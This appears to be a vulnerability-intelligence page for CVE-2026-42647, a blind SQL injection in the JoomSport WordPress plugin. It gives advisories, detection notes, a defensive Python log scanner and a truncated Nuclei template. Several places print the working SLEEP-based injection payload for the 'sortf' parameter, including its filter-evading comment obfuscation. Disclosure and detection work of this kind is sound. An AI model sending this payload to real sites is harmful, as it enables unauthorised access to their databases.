CVE-2026-42647
Published 2026-06-11
Priority P277 · critical · CVSS 3.1 base score 9.3
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 1.32% (67.3th percentile)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
This issue affects JoomSport: from n/a through 5.7.7.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beardev | joomsport | n/a – 5.7.7 | — |
Detection & IOCs (extracted from sources)
- url: {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC
- command: post_title`,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)#
- Detect time-based blind SQLi attempts against JoomSport's playerlist endpoint by monitoring for requests to paths matching the season/playerlist pattern with a `sortf` parameter containing SQL comment sequences (/**/) and SLEEP() calls.
- Flag HTTP requests where the `sortf` query parameter contains a backtick character (%60) followed by SQL injection payloads using inline comment obfuscation (/**/), a hallmark of this exploit.
- A successful exploitation attempt results in a response time >= 6 seconds with HTTP 200 and a body containing the strings 'Name', 'Match played', and 'Played minutes'; use response-time anomaly detection on this endpoint.
- The initial reconnaissance step queries the playerlist endpoint with legitimate parameters (action=playerlist&sortf=post_title&sortd=ASC); monitor for this pattern as a precursor to the injection attempt.
- The exploit is a multi-step attack: the first stage discovers the season path dynamically from the JoomSport page body before constructing the injection URL. Detection rules must account for the path being variable and unknown in advance.
- The SQL injection payload uses comment-based whitespace obfuscation (/**/) to bypass naive WAF/IDS keyword matching on spaces; signatures must account for this encoding.
- The time-based detection threshold is set at 6 seconds (SLEEP(6)); a network timeout of 20 seconds is configured for the exploit request, so detection based solely on response time may produce false negatives in high-latency environments.
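The detection notes above, turned into a small log scanner as an added example (not code from the CVE sources or the Nuclei template): it URL-decodes the `sortf` parameter before matching so that the %60 backtick and /**/ obfuscation are caught, labels the plain `sortf=post_title` request as the precursor stage, and correlates precursor-then-injection per client IP. The log lines are constructed combined-format samples; the field names and helper functions are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jun/2026:10:01:02 +0000] "GET /season/2026?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.7 - - [11/Jun/2026:10:01:09 +0000] "GET /season/2026?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1" 200 5120 "-" "curl/8.0"
198.51.100.4 - - [11/Jun/2026:10:02:00 +0000] "GET /season/2026?action=playerlist&sortf=post_title&sortd=DESC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Jun/2026:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Markers from the documented payload, matched after URL decoding and lower-casing
# so that %60 (backtick), %23 (#) and mixed case do not defeat the check.
INJECTION_MARKERS = ("`", "/**/", "sleep(")

def classify_request(target):
    """Return 'injection', 'precursor' or None for one request target (path + query)."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # first decode pass
    if qs.get("action", [""])[0] != "playerlist" or "sortf" not in qs:
        return None
    sortf = unquote_plus(qs["sortf"][0]).lower()  # second pass catches double encoding
    if any(marker in sortf for marker in INJECTION_MARKERS):
        return "injection"
    # A plain sort on post_title is the reconnaissance request that precedes the injection.
    return "precursor" if sortf == "post_title" else None

def scan_log(text):
    """One finding per suspicious playerlist request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["target"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "verdict": verdict, "status": int(m["status"])})
    return findings

def attack_chains(findings):
    """IPs that sent the precursor request and later an injection: the two-stage pattern."""
    seen_precursor, chains = set(), set()
    for f in findings:
        if f["verdict"] == "precursor":
            seen_precursor.add(f["ip"])
        elif f["verdict"] == "injection" and f["ip"] in seen_precursor:
            chains.add(f["ip"])
    return chains
```

Combined log format carries no response time, so the >= 6 second rule from the notes needs a log format that records request duration (for example nginx's $request_time) on top of this payload match.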
GHSA (ghsa_unreviewed · 2026-06-12)
CVE-2026-42647 [CRITICAL] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection.
This issue affects JoomSport: from n/a through 5.7.7.
VulnCheck (vulncheck · 2026)
CVE-2026-42647 Vulnerability
WordPress Plugin: joomsport-sports-league-results-management: CVE-2026-42647: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability
No detection rules found.
Nuclei (nuclei · CVSS 9.3)
CVE-2026-42647 JoomSport <= 5.7.7 - SQL Injection

Indexed template fragment (the start of the template, including the season-path regex, is truncated in the source and is shown as indexed):

```yaml
        JoomSport ")'
        condition: and
        internal: true
    extractors:
      - type: regex
        name: season_path
        part: body
        group: 1
        regex:
          - '[^'
        internal: true
  - raw:
      - |
        GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
        internal: true
  - raw:
      - |
        @timeout: 20s
        GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
# digest: 4b0a004830460221008d3867aa562b040ffd2a8ba0ab0557b981ef5e44f
```
No writeups or analysis indexed.
2026-06-11: Published · Exploited in the wild